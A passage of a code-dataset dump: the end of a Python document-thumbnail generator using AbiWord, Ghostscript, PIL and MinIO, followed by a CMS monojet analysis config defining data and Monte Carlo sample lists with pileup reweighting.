            except CursorNotFound:
                # cursor timed out server-side: re-query and keep going
                files = File.objects(thumbnailStatus__exists=False, body=self.body.id).no_cache().all()
                file = next(files)
                continue
            except StopIteration:
                break
            if not file:
                break
            self.datalog.info('processing file %s' % file.id)
            file.modified = datetime.datetime.now()
            # NOTE(review): 'thumbnailGenerated' (no 's') differs from the
            # 'thumbnailsGenerated' field written below — confirm which one
            # the File model actually defines before cleaning this up.
            file.thumbnailGenerated = datetime.datetime.now()
            # get file
            file_path = os.path.join(self.config.TMP_THUMBNAIL_DIR, str(file.id))
            if not self.get_file(file, file_path):
                self.datalog.warn('file not found: %s' % file.id)
                self.statistics['file-missing'] += 1
                file.thumbnailStatus = 'file-missing'
                file.thumbnailsGenerated = datetime.datetime.now()
                file.modified = datetime.datetime.now()
                file.save()
                continue
            if file.mimeType not in ['application/msword', 'application/pdf']:
                self.datalog.warn('wrong mimetype: %s' % file.id)
                self.statistics['wrong-mimetype'] += 1
                file.thumbnailStatus = 'wrong-mimetype'
                file.thumbnailsGenerated = datetime.datetime.now()
                file.modified = datetime.datetime.now()
                file.save()
                os.unlink(file_path)
                continue
            file_path_old = False
            if file.mimeType == 'application/msword':
                # convert .doc to PDF: the PDF lands in '<id>-old' and
                # becomes the ghostscript input below
                file_path_old = file_path
                file_path = file_path + '-old'
                cmd = ('%s --to=PDF -o %s %s' % (self.config.ABIWORD_COMMAND, file_path, file_path_old))
                self.execute(cmd, self.body.id)
            # create folders
            max_folder = os.path.join(self.config.TMP_THUMBNAIL_DIR, str(file.id) + '-max')
            if not os.path.exists(max_folder):
                os.makedirs(max_folder)
            out_folder = os.path.join(self.config.TMP_THUMBNAIL_DIR, str(file.id) + '-out')
            if not os.path.exists(out_folder):
                os.makedirs(out_folder)
            for size in self.config.THUMBNAIL_SIZES:
                if not os.path.exists(os.path.join(out_folder, str(size))):
                    os.makedirs(os.path.join(out_folder, str(size)))
            file.thumbnail = {}
            pages = 0
            # generate max images (one full-resolution PNG per page)
            max_path = max_folder + os.sep + '%d.png'
            cmd = '%s -dQUIET -dSAFER -dBATCH -dNOPAUSE -sDisplayHandle=0 -sDEVICE=png16m -r100 -dTextAlphaBits=4 -sOutputFile=%s -f %s' % (
                self.config.GHOSTSCRIPT_COMMAND, max_path, file_path)
            self.execute(cmd, self.body.id)
            # generate thumbnails based on max images
            for max_file in os.listdir(max_folder):
                pages += 1
                file_path_max = os.path.join(max_folder, max_file)
                num = max_file.split('.')[0]
                im = Image.open(file_path_max)
                im = self.conditional_to_greyscale(im)
                (owidth, oheight) = im.size
                file.thumbnail[str(num)] = {
                    'page': int(num),
                    'pages': {}
                }
                for size in self.config.THUMBNAIL_SIZES:
                    (width, height) = self.scale_width_height(size, owidth, oheight)
                    # Two-way resizing: for large shrink factors go through a
                    # cheap NEAREST pass at double size before ANTIALIAS
                    resizedim = im
                    if oheight > (height * 2.5):
                        # generate intermediate image with double size
                        resizedim = resizedim.resize((width * 2, height * 2), Image.NEAREST)
                    resizedim = resizedim.resize((width, height), Image.ANTIALIAS)
                    out_path = os.path.join(out_folder, str(size), str(num) + '.jpg')
                    resizedim.save(out_path, subsampling=0, quality=80)
                    # optimize image
                    cmd = '%s --preserve-perms %s' % (self.config.JPEGOPTIM_PATH, out_path)
                    self.execute(cmd, self.body.id)
                    # create mongodb object and append it to file
                    file.thumbnail[str(num)]['pages'][str(size)] = {
                        'width': width,
                        'height': height,
                        'filesize': os.path.getsize(out_path)
                    }
            # save all generated files in minio
            for size in self.config.THUMBNAIL_SIZES:
                for out_file in os.listdir(os.path.join(out_folder, str(size))):
                    try:
                        self.s3.fput_object(
                            self.config.S3_BUCKET,
                            "file-thumbnails/%s/%s/%s/%s" % (self.body.id, str(file.id), str(size), out_file),
                            os.path.join(out_folder, str(size), out_file),
                            'image/jpeg'
                        )
                    except ResponseError as err:
                        self.datalog.error(
                            'Critical error saving file from File %s from Body %s' % (file.id, self.body.id))
            # save in mongodb
            file.thumbnailStatus = 'successful'
            file.thumbnailsGenerated = datetime.datetime.now()
            file.modified = datetime.datetime.now()
            file.pages = pages
            file.save()
            # bugfix: this counter existed but was never incremented
            self.statistics['successful'] += 1
            # tidy up
            try:
                os.unlink(file_path)
            except FileNotFoundError:
                pass
            try:
                if file_path_old:
                    # bugfix: remove the original .doc download as well;
                    # previously this unlinked file_path a second time and
                    # leaked file_path_old in the tmp dir
                    os.unlink(file_path_old)
            except FileNotFoundError:
                pass
            shutil.rmtree(max_folder)
            shutil.rmtree(out_folder)

    def conditional_to_greyscale(self, image):
        """
        Convert the image to greyscale if the image information
        is greyscale only
        """
        bands = image.getbands()
        if len(bands) >= 3:
            # histogram for all bands concatenated
            hist = image.histogram()
            if len(hist) >= 768:
                hist1 = hist[0:256]
                hist2 = hist[256:512]
                hist3 = hist[512:768]
                # print "length of histograms: %d %d %d" % (len(hist1), len(hist2), len(hist3))
                if hist1 == hist2 == hist3:
                    # identical channel histograms: the image carries no colour
                    return image.convert('L')
        return image

    def scale_width_height(self, height, original_width, original_height):
        """Return (width, height) preserving aspect ratio for a target height."""
        factor = float(height) / float(original_height)
        width = int(round(factor * original_width))
        return (width, height)
| [
"[email protected]"
] | |
248b8e5a606abc28c5345081f3e44a98c551c887 | 6450234cc5339e9d05102b25b25ba38e2bd9e4cb | /MonoJetAnalysis/python/defaultMETSamples_mc.py | 7e30898207a90d75e9d21b8ec7eea5427d251ec5 | [] | no_license | wa01/Workspace | 57b87481005c441ab91a8180ddf6ea00b520aca7 | 47759c6a20473f7a694ca9e3fd4e0e8343c8018c | refs/heads/master | 2021-01-15T10:36:55.429420 | 2014-09-20T17:44:54 | 2014-09-20T17:44:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,897 | py | import copy, os, sys
allSamples = []
from Workspace.HEPHYPythonTools.createPUReweightingHisto import getPUReweightingUncertainty
S10rwHisto = getPUReweightingUncertainty("S10", dataFile = "/data/schoef/tools/PU/MyDataPileupHistogram_Run2012ABCD_60max_true_pixelcorr_Sys0.root")
S10rwPlusHisto = getPUReweightingUncertainty("S10", dataFile = "/data/schoef/tools/PU/MyDataPileupHistogram_Run2012ABCD_60max_true_pixelcorr_SysPlus5.root")
S10rwMinusHisto = getPUReweightingUncertainty("S10", dataFile = "/data/schoef/tools/PU/MyDataPileupHistogram_Run2012ABCD_60max_true_pixelcorr_SysMinus5.root")
data={}
data["name"] = "data";
data["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614/"
data['newMETCollection'] = True
data["bins"] = ["MET-Run2012A-22Jan2013-3", "MET-Run2012B-22Jan2013", "MET-Run2012C-22Jan2013", "MET-Run2012D-22Jan2013"]
data["Chain"] = "Events"
data["Counter"] = "bool_EventCounter_passed_PAT.obj"
allSamples.append(data)
dataSingleMu={}
dataSingleMu["name"] = "data";
dataSingleMu['newMETCollection'] = True
dataSingleMu["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614/"
dataSingleMu["bins"] = ["SingleMu-Run2012A-22Jan2013", "SingleMu-Run2012B-22Jan2013", "SingleMu-Run2012C-22Jan2013", "SingleMu-Run2012D-22Jan2013"]
dataSingleMu["Chain"] = "Events"
dataSingleMu["Counter"] = "bool_EventCounter_passed_PAT.obj"
allSamples.append(dataSingleMu)
mc={}
mc["name"] = "mc";
mc["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
mc['newMETCollection'] = True
mc["Chain"] = "Events"
#mc["reweightingHistoFile"] = "/data/schoef/tools/PU/reweightingHisto_Summer2012-S10-Run2012ABCD_60max_true_pixelcorr_Sys0.root"
#mc["reweightingHistoFileSysPlus"] = "/data/schoef/tools/PU/reweightingHisto_Summer2012-S10-Run2012ABCD_60max_true_pixelcorr_SysPlus5.root"
#mc["reweightingHistoFileSysMinus"] = "/data/schoef/tools/PU/reweightingHisto_Summer2012-S10-Run2012ABCD_60max_true_pixelcorr_SysMinus5.root"
QCD_Bins = \
["8TeV-QCD-Pt1000-MuEnrichedPt5", "8TeV-QCD-Pt120to170-MuEnrichedPt5", "8TeV-QCD-Pt170to300-MuEnrichedPt5",\
"8TeV-QCD-Pt20to30-MuEnrichedPt5", "8TeV-QCD-Pt300to470-MuEnrichedPt5", "8TeV-QCD-Pt30to50-MuEnrichedPt5",\
"8TeV-QCD-Pt470to600-MuEnrichedPt5", "8TeV-QCD-Pt50to80-MuEnrichedPt5",\
"8TeV-QCD-Pt600to800-MuEnrichedPt5", "8TeV-QCD-Pt800to1000-MuEnrichedPt5", "8TeV-QCD-Pt80to120-MuEnrichedPt5"]
#WJets_Bins = ["8TeV-WJets-HT250to300", "8TeV-WJets-HT300to400", "8TeV-WJets-HT400"]
#
DY_Bins = ["8TeV-DYJetsToLL-M10to50", "8TeV-DYJetsToLL-M50"]
#ZJets_Bins = DY_Bins
ZJetsInv_Bins = ["8TeV-ZJetsToNuNu-HT100to200", "8TeV-ZJetsToNuNu-HT200-400",\
"8TeV-ZJetsToNuNu-HT400", "8TeV-ZJetsToNuNu-HT50to100"]
#
singleTop_Bins = ["8TeV-T-t", "8TeV-T-s", "8TeV-T-tW", "8TeV-Tbar-t", "8TeV-Tbar-s", "8TeV-Tbar-tW"]
#ttbar = copy.deepcopy(mc)
#ttbar['reweightingHistoFile'] = S10rwHisto
#ttbar['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#ttbar['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#ttbar["bins"] = ["8TeV-TTJets"]
#ttbar["name"] = "TTJets"
#ttbar['reweightingHistoFile'] = S10rwHisto
#ttbar['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#ttbar['reweightingHistoFileSysMinus'] = S10rwMinusHisto
ttbarPowHeg = copy.deepcopy(mc)
ttbarPowHeg['reweightingHistoFile'] = S10rwHisto
ttbarPowHeg['reweightingHistoFileSysPlus'] = S10rwPlusHisto
ttbarPowHeg['reweightingHistoFileSysMinus'] = S10rwMinusHisto
ttbarPowHeg["bins"] = [["8TeV-TTJets-powheg-v1+2", ["8TeV-TTJets-powheg-v1", "8TeV-TTJets-powheg-v2"]]]
ttbarPowHeg["name"] = "TTJetsPowHeg"
ttbarPowHeg['reweightingHistoFile'] = S10rwHisto
ttbarPowHeg['reweightingHistoFileSysPlus'] = S10rwPlusHisto
ttbarPowHeg['reweightingHistoFileSysMinus'] = S10rwMinusHisto
wjetsInc = copy.deepcopy(mc)
wjetsInc["bins"] = ["8TeV-WJetsToLNu"]
wjetsInc["name"] = "WJetsToLNu"
wjetsInc['reweightingHistoFile'] = S10rwHisto
wjetsInc['reweightingHistoFileSysPlus'] = S10rwPlusHisto
wjetsInc['reweightingHistoFileSysMinus'] = S10rwMinusHisto
w1jets = copy.deepcopy(mc)
w1jets["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614/"
w1jets['newMETCollection'] = True
w1jets["bins"] = ["8TeV-W1JetsToLNu"]
w1jets["name"] = "W1JetsToLNu"
w1jets['reweightingHistoFile'] = S10rwHisto
w1jets['reweightingHistoFileSysPlus'] = S10rwPlusHisto
w1jets['reweightingHistoFileSysMinus'] = S10rwMinusHisto
w2jets = copy.deepcopy(w1jets)
w2jets["bins"] = ["8TeV-W2JetsToLNu"]
w2jets['newMETCollection'] = True
w2jets["name"] = "W2JetsToLNu"
w2jets['reweightingHistoFile'] = S10rwHisto
w2jets['reweightingHistoFileSysPlus'] = S10rwPlusHisto
w2jets['reweightingHistoFileSysMinus'] = S10rwMinusHisto
w3jets = copy.deepcopy(w1jets)
w3jets["bins"] = ["8TeV-W3JetsToLNu"]
w3jets['newMETCollection'] = True
w3jets["name"] = "W3JetsToLNu"
w3jets['reweightingHistoFile'] = S10rwHisto
w3jets['reweightingHistoFileSysPlus'] = S10rwPlusHisto
w3jets['reweightingHistoFileSysMinus'] = S10rwMinusHisto
w4jets = copy.deepcopy(w1jets)
w4jets["bins"] = ["8TeV-W4JetsToLNu"]
w4jets['newMETCollection'] = True
w4jets["name"] = "W4JetsToLNu"
w4jets['reweightingHistoFile'] = S10rwHisto
w4jets['reweightingHistoFileSysPlus'] = S10rwPlusHisto
w4jets['reweightingHistoFileSysMinus'] = S10rwMinusHisto
wbbjets = copy.deepcopy(w1jets)
wbbjets["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_140212"
wbbjets['newMETCollection'] = True
wbbjets["bins"]=["8TeV-WbbJetsToLNu"]
wbbjets["name"] = "WbbJets"
wbbjets['reweightingHistoFile'] = S10rwHisto
wbbjets['reweightingHistoFileSysPlus'] = S10rwPlusHisto
wbbjets['reweightingHistoFileSysMinus'] = S10rwMinusHisto
wjetsHT150v2 = copy.deepcopy(mc)
wjetsHT150v2["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
wjetsHT150v2['newMETCollection'] = True
wjetsHT150v2["bins"] = ["8TeV-WJetsToLNu_HT-150To200", "8TeV-WJetsToLNu_HT-200To250", "8TeV-WJetsToLNu_HT-250To300", "8TeV-WJetsToLNu_HT-300To400", "8TeV-WJetsToLNu_HT-400ToInf"]
wjetsHT150v2["name"] = "WJetsHT150v2"
wjetsHT150v2['reweightingHistoFile'] = S10rwHisto
wjetsHT150v2['reweightingHistoFileSysPlus'] = S10rwPlusHisto
wjetsHT150v2['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#wjetsToLNuPtW100 = copy.deepcopy(mc)
#wjetsToLNuPtW100["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#wjetsToLNuPtW100['newMETCollection'] = True
#wjetsToLNuPtW100["bins"] = ["8TeV-WJetsToLNu_PtW-100_TuneZ2star_8TeV_ext-madgraph-tarball"]
#wjetsToLNuPtW100["name"] = "WJetsToLNu_PtW-100_TuneZ2star_8TeV_ext-madgraph-tarball"
#wjetsToLNuPtW100['reweightingHistoFile'] = S10rwHisto
#wjetsToLNuPtW100['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#wjetsToLNuPtW100['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
#wjetsToLNuPtW180 = copy.deepcopy(mc)
#wjetsToLNuPtW180["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#wjetsToLNuPtW180['newMETCollection'] = True
#wjetsToLNuPtW180["bins"] = ["8TeV-WJetsToLNu_PtW-180_TuneZ2star_8TeV-madgraph-tarball"]
#wjetsToLNuPtW180["name"] = "WJetsToLNu_PtW-180_TuneZ2star_8TeV-madgraph-tarball"
#wjetsToLNuPtW180['reweightingHistoFile'] = S10rwHisto
#wjetsToLNuPtW180['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#wjetsToLNuPtW180['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
#wjetsToLNuPtW50 = copy.deepcopy(mc)
#wjetsToLNuPtW50["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#wjetsToLNuPtW50['newMETCollection'] = True
#wjetsToLNuPtW50["bins"] = ["8TeV-WJetsToLNu_PtW-50To70_TuneZ2star_8TeV-madgraph", "8TeV-WJetsToLNu_PtW-70To100_TuneZ2star_8TeV-madgraph", "8TeV-WJetsToLNu_PtW-100_TuneZ2star_8TeV-madgraph"]
#wjetsToLNuPtW50["name"] = "WJetsToLNu_PtW-50_TuneZ2star_8TeV-madgraph"
#wjetsToLNuPtW50['reweightingHistoFile'] = S10rwHisto
#wjetsToLNuPtW50['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#wjetsToLNuPtW50['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
#
#wMinusToLNu = copy.deepcopy(mc)
#wMinusToLNu["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#wMinusToLNu['newMETCollection'] = True
#wMinusToLNu["bins"] = ["8TeV-WminusToENu", "8TeV-WminusToMuNu", "8TeV-WminusToTauNu-tauola"]
#wMinusToLNu["name"] = "WminusToLNu"
#wMinusToLNu['reweightingHistoFile'] = S10rwHisto
#wMinusToLNu['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#wMinusToLNu['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
#wPlusToLNu = copy.deepcopy(mc)
#wPlusToLNu["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#wPlusToLNu['newMETCollection'] = True
#wPlusToLNu["bins"] = ["8TeV-WplusToENu", "8TeV-WplusToMuNu", "8TeV-WplusToTauNu-tauola"]
#wPlusToLNu["name"] = "WplusToLNu"
#wPlusToLNu['reweightingHistoFile'] = S10rwHisto
#wPlusToLNu['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#wPlusToLNu['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#
dy = copy.deepcopy(mc)
dy["bins"] = DY_Bins
dy["name"] = "DY"
dy['reweightingHistoFile'] = S10rwHisto
dy['reweightingHistoFileSysPlus'] = S10rwPlusHisto
dy['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#dyJetsToLLPtZ180 = copy.deepcopy(mc)
#dyJetsToLLPtZ180["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#dyJetsToLLPtZ180['newMETCollection'] = True
#dyJetsToLLPtZ180["bins"] = ["8TeV-DYJetsToLL_PtZ-180_TuneZ2star_8TeV-madgraph-tarball"]
#dyJetsToLLPtZ180["name"] = "DYJetsToLL_PtZ-180_TuneZ2star_8TeV-madgraph-tarball"
#dyJetsToLLPtZ180['reweightingHistoFile'] = S10rwHisto
#dyJetsToLLPtZ180['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#dyJetsToLLPtZ180['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
#dyJetsToLLPtZ50 = copy.deepcopy(mc)
#dyJetsToLLPtZ50["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#dyJetsToLLPtZ50['newMETCollection'] = True
#dyJetsToLLPtZ50["bins"] = ["8TeV-DYJetsToLL_PtZ-50To70_TuneZ2star_8TeV-madgraph-tarball", "8TeV-DYJetsToLL_PtZ-70To100_TuneZ2star_8TeV-madgraph-tarball", "8TeV-DYJetsToLL_PtZ-100_TuneZ2star_8TeV-madgraph"]
#dyJetsToLLPtZ50["name"] = "DYJetsToLL_PtZ-50_TuneZ2star_8TeV-madgraph-tarball"
#dyJetsToLLPtZ50['reweightingHistoFile'] = S10rwHisto
#dyJetsToLLPtZ50['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#dyJetsToLLPtZ50['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
dyJetsToLLPtZ50Ext = copy.deepcopy(mc)
dyJetsToLLPtZ50Ext['newMETCollection'] = True
dyJetsToLLPtZ50Ext["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
dyJetsToLLPtZ50Ext["bins"] = ["8TeV-DYJetsToLL_PtZ-50To70_TuneZ2star_8TeV_ext-madgraph-tarball", "8TeV-DYJetsToLL_PtZ-70To100_TuneZ2star_8TeV_ext-madgraph-tarball", "8TeV-DYJetsToLL_PtZ-100_TuneZ2star_8TeV_ext-madgraph-tarball"]
dyJetsToLLPtZ50Ext["name"] = "8TeV-DYJetsToLL_PtZ-50_TuneZ2star_8TeV_ext-madgraph-tarball"
dyJetsToLLPtZ50Ext['reweightingHistoFile'] = S10rwHisto
dyJetsToLLPtZ50Ext['reweightingHistoFileSysPlus'] = S10rwPlusHisto
dyJetsToLLPtZ50Ext['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
zinv = copy.deepcopy(mc)
zinv["bins"] = ZJetsInv_Bins
zinv["name"] = "ZJetsInv"
zinv['reweightingHistoFile'] = S10rwHisto
zinv['reweightingHistoFileSysPlus'] = S10rwPlusHisto
zinv['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#zJetsToNuNuHT50 = copy.deepcopy(mc)
#zJetsToNuNuHT50["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#zJetsToNuNuHT50['newMETCollection'] = True
#zJetsToNuNuHT50["bins"] = ["8TeV-ZJetsToNuNu_50_HT_100_TuneZ2Star_8TeV_madgraph", "8TeV-ZJetsToNuNu_100_HT_200_TuneZ2Star_8TeV_madgraph", "8TeV-ZJetsToNuNu_200_HT_400_TuneZ2Star_8TeV_madgraph", "8TeV-ZJetsToNuNu_400_HT_inf_TuneZ2Star_8TeV_madgraph"]
#zJetsToNuNuHT50["name"] = "8TeV-ZJetsToNuNu_50_TuneZ2Star_8TeV_madgraph"
#zJetsToNuNuHT50['reweightingHistoFile'] = S10rwHisto
#zJetsToNuNuHT50['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#zJetsToNuNuHT50['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
#zJetsToNuNuHT50Ext = copy.deepcopy(mc)
#zJetsToNuNuHT50Ext["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614"
#zJetsToNuNuHT50Ext['newMETCollection'] = True
#zJetsToNuNuHT50Ext["bins"] = ["8TeV-ZJetsToNuNu_50_HT_100_TuneZ2Star_8TeV_madgraph_ext", "8TeV-ZJetsToNuNu_100_HT_200_TuneZ2Star_8TeV_madgraph_ext", "8TeV-ZJetsToNuNu_200_HT_400_TuneZ2Star_8TeV_madgraph_ext", "8TeV-ZJetsToNuNu_400_HT_inf_TuneZ2Star_8TeV_madgraph_ext"]
#zJetsToNuNuHT50Ext["name"] = "8TeV-ZJetsToNuNu_50_TuneZ2Star_8TeV_madgraph_ext"
#zJetsToNuNuHT50Ext['reweightingHistoFile'] = S10rwHisto
#zJetsToNuNuHT50Ext['reweightingHistoFileSysPlus'] = S10rwPlusHisto
#zJetsToNuNuHT50Ext['reweightingHistoFileSysMinus'] = S10rwMinusHisto
singleTop = copy.deepcopy(mc)
singleTop["bins"] = singleTop_Bins
singleTop["name"] = "singleTop"
singleTop['reweightingHistoFile'] = S10rwHisto
singleTop['reweightingHistoFileSysPlus'] = S10rwPlusHisto
singleTop['reweightingHistoFileSysMinus'] = S10rwMinusHisto
qcd = copy.deepcopy(mc)
qcd["bins"] = QCD_Bins
qcd["name"] = "QCD"
qcd['reweightingHistoFile'] = S10rwHisto
qcd['reweightingHistoFileSysPlus'] = S10rwPlusHisto
qcd['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
qcd1 = copy.deepcopy(mc)
qcd1["bins"] = ["8TeV-QCD-Pt20to30-MuEnrichedPt5", "8TeV-QCD-Pt30to50-MuEnrichedPt5",\
"8TeV-QCD-Pt50to80-MuEnrichedPt5", "8TeV-QCD-Pt80to120-MuEnrichedPt5",\
"8TeV-QCD-Pt120to170-MuEnrichedPt5", "8TeV-QCD-Pt170to300-MuEnrichedPt5",\
"8TeV-QCD-Pt300to470-MuEnrichedPt5", "8TeV-QCD-Pt470to600-MuEnrichedPt5"]
qcd1["name"] = "QCD20to600"
qcd1['reweightingHistoFile'] = S10rwHisto
qcd1['reweightingHistoFileSysPlus'] = S10rwPlusHisto
qcd1['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
qcd1a = copy.deepcopy(mc)
qcd1a["bins"] = ["8TeV-QCD-Pt20to30-MuEnrichedPt5", "8TeV-QCD-Pt30to50-MuEnrichedPt5",\
"8TeV-QCD-Pt50to80-MuEnrichedPt5", "8TeV-QCD-Pt80to120-MuEnrichedPt5",\
"8TeV-QCD-Pt120to170-MuEnrichedPt5", "8TeV-QCD-Pt170to300-MuEnrichedPt5"]
qcd1a["name"] = "QCD20to300"
qcd1a['reweightingHistoFile'] = S10rwHisto
qcd1a['reweightingHistoFileSysPlus'] = S10rwPlusHisto
qcd1a['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
qcd1b = copy.deepcopy(mc)
qcd1b["bins"] = ["8TeV-QCD-Pt300to470-MuEnrichedPt5", "8TeV-QCD-Pt470to600-MuEnrichedPt5"]
qcd1b["name"] = "QCD300to600"
qcd1b['reweightingHistoFile'] = S10rwHisto
qcd1b['reweightingHistoFileSysPlus'] = S10rwPlusHisto
qcd1b['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
qcd2 = copy.deepcopy(mc)
qcd2["bins"] = ["8TeV-QCD-Pt600to800-MuEnrichedPt5", "8TeV-QCD-Pt800to1000-MuEnrichedPt5"]
qcd2["name"] = "QCD600to1000"
qcd2['reweightingHistoFile'] = S10rwHisto
qcd2['reweightingHistoFileSysPlus'] = S10rwPlusHisto
qcd2['reweightingHistoFileSysMinus'] = S10rwMinusHisto
#
qcd3 = copy.deepcopy(mc)
qcd3["bins"] = ["8TeV-QCD-Pt1000-MuEnrichedPt5"]
qcd3["name"] = "QCD1000"
qcd3['reweightingHistoFile'] = S10rwHisto
qcd3['reweightingHistoFileSysPlus'] = S10rwPlusHisto
qcd3['reweightingHistoFileSysMinus'] = S10rwMinusHisto
####
ww = copy.deepcopy(mc)
ww["bins"] = ["8TeV-WW"]
ww["name"] = "WW"
ww['reweightingHistoFile'] = S10rwHisto
ww['reweightingHistoFileSysPlus'] = S10rwPlusHisto
ww['reweightingHistoFileSysMinus'] = S10rwMinusHisto
wz = copy.deepcopy(mc)
wz["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614/"
wz['newMETCollection'] = True
wz["bins"] = ["8TeV-WZ"]
wz["name"] = "WZ"
wz['reweightingHistoFile'] = S10rwHisto
wz['reweightingHistoFileSysPlus'] = S10rwPlusHisto
wz['reweightingHistoFileSysMinus'] = S10rwMinusHisto
zz = copy.deepcopy(mc)
zz["bins"] = ["8TeV-ZZ"]
zz['newMETCollection'] = True
zz["dirname"] = "/dpm/oeaw.ac.at/home/cms/store/user/schoef/pat_240614/"
zz["name"] = "ZZ"
zz['reweightingHistoFile'] = S10rwHisto
zz['reweightingHistoFileSysPlus'] = S10rwPlusHisto
zz['reweightingHistoFileSysMinus'] = S10rwMinusHisto
ttw = copy.deepcopy(mc)
ttw["bins"] = ["8TeV-TTWJets"]
ttw["name"] = "TTWJets"
ttw['reweightingHistoFile'] = S10rwHisto
ttw['reweightingHistoFileSysPlus'] = S10rwPlusHisto
ttw['reweightingHistoFileSysMinus'] = S10rwMinusHisto
stop200lsp170g100FastSim = copy.deepcopy(mc)
stop200lsp170g100FastSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FastSim"
stop200lsp170g100FastSim["bins"] = ["8TeV-stop200lsp170g100"]
stop200lsp170g100FastSim["name"] = "stop200lsp170g100FastSim"
stop300lsp240g150FastSim = copy.deepcopy(mc)
stop300lsp240g150FastSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FastSim"
stop300lsp240g150FastSim["bins"] = ["8TeV-stop300lsp240g150"]
stop300lsp240g150FastSim["name"] = "stop300lsp240g150FastSim"
stop300lsp270g175FastSim = copy.deepcopy(mc)
stop300lsp270g175FastSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FastSim"
stop300lsp270g175FastSim["bins"] = ["8TeV-stop300lsp270g175"]
stop300lsp270g175FastSim["name"] = "stop300lsp270g175FastSim"
stop300lsp270FastSim = copy.deepcopy(mc)
stop300lsp270FastSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FastSim"
stop300lsp270FastSim["bins"] = ["8TeV-stop300lsp270"]
stop300lsp270FastSim["name"] = "stop300lsp270FastSim"
stop300lsp270g200FastSim = copy.deepcopy(mc)
stop300lsp270g200FastSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FastSim"
stop300lsp270g200FastSim["bins"] = ["8TeV-stop300lsp270g200"]
stop300lsp270g200FastSim["name"] = "stop300lsp270g200FastSim"
stop200lsp170g100FullSim = copy.deepcopy(mc)
stop200lsp170g100FullSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FullSim"
stop200lsp170g100FullSim["bins"] = ["8TeV-stop200lsp170g100"]
stop200lsp170g100FullSim["name"] = "stop200lsp170g100FullSim"
stop300lsp240g150FullSim = copy.deepcopy(mc)
stop300lsp240g150FullSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FullSim"
stop300lsp240g150FullSim["bins"] = ["8TeV-stop300lsp240g150"]
stop300lsp240g150FullSim["name"] = "stop300lsp240g150FullSim"
stop300lsp270g175FullSim = copy.deepcopy(mc)
stop300lsp270g175FullSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FullSim"
stop300lsp270g175FullSim["bins"] = ["8TeV-stop300lsp270g175"]
stop300lsp270g175FullSim["name"] = "stop300lsp270g175FullSim"
stop300lsp270FullSim = copy.deepcopy(mc)
stop300lsp270FullSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FullSim"
stop300lsp270FullSim["bins"] = ["8TeV-stop300lsp270"]
stop300lsp270FullSim["name"] = "stop300lsp270FullSim"
stop300lsp270g200FullSim = copy.deepcopy(mc)
stop300lsp270g200FullSim["dirname"] = "/data/schoef/monoJetSignals/SUSYTupelizer/FullSim"
stop300lsp270g200FullSim["bins"] = ["8TeV-stop300lsp270g200"]
stop300lsp270g200FullSim["name"] = "stop300lsp270g200FullSim"
for s in [stop200lsp170g100FastSim, stop300lsp240g150FastSim, stop300lsp270g175FastSim, stop300lsp270FastSim, stop300lsp270g200FastSim, stop200lsp170g100FullSim, stop300lsp240g150FullSim, stop300lsp270g175FullSim, stop300lsp270FullSim, stop300lsp270g200FullSim]:
s['reweightingHistoFile'] = S10rwHisto
s['reweightingHistoFileSysPlus'] = S10rwPlusHisto
s['reweightingHistoFileSysMinus'] = S10rwMinusHisto
| [
"[email protected]"
] | |
